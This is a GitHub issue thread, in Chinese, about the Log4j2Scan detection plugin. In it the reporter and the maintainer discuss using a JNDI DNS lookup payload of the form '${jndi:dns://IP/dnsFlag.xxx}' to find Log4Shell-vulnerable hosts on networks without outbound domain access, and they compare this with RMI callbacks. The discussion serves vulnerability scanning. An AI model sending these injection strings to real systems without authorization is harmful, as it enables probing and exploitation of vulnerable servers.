### ISSUE TITLE
在内网不出网或没有域名的情况下，建议采用${jndi:dns://xxx.xxx.xxx.xxx:port/dnsFlag.XXX}的方式来检测

### ISSUE THREAD

**Issue by hanc00l** [whwlsfb/Log4j2Scan#38]
目前的RevSuitDNS及POC9是用${jndi:dns://xxx.dnsFlag.domain}/yyy}的方式，还是依赖域名；如果改成${jndi:dns://domain/dnsFlag.XXX}的方式domain指定为ip，用dnsFlag.XXX来作为检测，可以去除域名依赖，最终exp为${jndi:dns://1.2.3.4/dnsFlag.xxx/yyy}。我小改了一下，只需要修改三行代码。

![截屏2021-12-16 15 16 21](https://user-images.githubusercontent.com/12759172/146330467-c61ab13c-1a3c-44d9-8c8c-59ef9ea5f9d3.png)
![截屏2021-12-16 15 21 31](https://user-images.githubusercontent.com/12759172/146330709-507ffd43-e2dc-48d7-a117-aa536a3811f1.png)

作者可以看看是否可行

**Comment by whwlsfb** [comment]
不出网环境下可以用RevSuitRMI来解决域名依赖的问题，你试下搭一个RMI的环境，是不是符合你的要求

**Comment by hanc00l** [comment]
测试了没成功，提示这个信息：
```
Create RevSuit rmi rule 'palgts' succeed!

Service-side RevSuit unsupported batch check!

Log4j2Scan loaded successfully!
```

个人觉得相比RMI，dns协议内部穿透性一般会更强一些。

**Comment by whwlsfb** [comment]
是成功了的，只是你的服务端不支持一个增强功能

**Comment by hanc00l** [comment]
重新检查和设置了一遍插件里的参数，确实有RMI请求并且提示检查到了漏洞。在内网里，DNS协议相比RMI（TCP）协议，是否穿透性更好一点？

**Comment by whwlsfb** [comment]
> 重新检查和设置了一遍插件里的参数，确实有RMI请求并且提示检查到了漏洞。在内网里，DNS协议相比RMI（TCP）协议，是否穿透性更好一点？

理论上穿透性将会更好，请问你那边有没有对应包含webapi的dns server的推荐

**Comment by whwlsfb** [comment]
> > 重新检查和设置了一遍插件里的参数，确实有RMI请求并且提示检查到了漏洞。在内网里，DNS协议相比RMI（TCP）协议，是否穿透性更好一点？
> 
> 理论上穿透性将会更好，请问你那边有没有对应包含webapi的dns server的推荐

我看了下，revsuit的txt记录好像可以兼容`jndi:dns://xxx/payload`将考虑在后续版本加入
